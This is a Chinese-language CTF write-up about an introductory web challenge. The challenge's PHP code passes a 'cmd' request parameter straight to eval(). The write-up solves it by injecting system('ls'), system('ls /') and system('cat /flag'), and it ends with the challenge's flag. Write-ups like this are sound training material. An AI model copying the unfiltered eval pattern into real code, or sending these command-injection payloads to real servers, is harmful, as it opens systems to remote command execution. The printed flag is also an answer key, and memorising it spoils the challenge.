青少年CTF-qsnctf-Web-eval
【摘要】 题目环境:出题人:末心题目难度:★题目描述:Eval是个什么呢,flag格式为:qsnctf{xxx}。做道末心师傅出的题啦😉<?phphighlight_file(__FILE__);if (isset($_REQUEST['cmd'])) { eval($_REQUEST["cmd"]);}?>给了一个参数cmd这个参数cmd存在外部执行漏洞补充:system是外部命令执行函数列...
题目环境:
出题人:末心
题目难度:★
题目描述:Eval是个什么呢,flag格式为:qsnctf{xxx}。
做道末心师傅出的题啦😉
<?php
highlight_file(__FILE__);
if (isset($_REQUEST['cmd'])) {
eval($_REQUEST["cmd"]);
}
?>
- 给了一个参数cmd
- 这个参数cmd存在外部执行漏洞
补充:
system是外部命令执行函数
列出此路径下的目录和文件?cmd=system("ls");
有回显结果!
列出根目录下的目录和文件?cmd=system("ls /");
发现了flag的存在!
查看flag的内容?cmd=system("cat /flag");
得到flag:qsnctf{4e90381c-e0b6-4608-a7c7-8cddc0f1b594}
【版权声明】本文为华为云社区用户原创内容,未经允许不得转载,如需转载请自行联系原作者进行授权。如果您发现本社区中有涉嫌抄袭的内容,欢迎发送邮件进行举报,并提供相关证据,一经查实,本社区将立刻删除涉嫌侵权内容,举报邮箱:
cloudbbs@huaweicloud.com
- 点赞
- 收藏
- 关注作者
评论(0)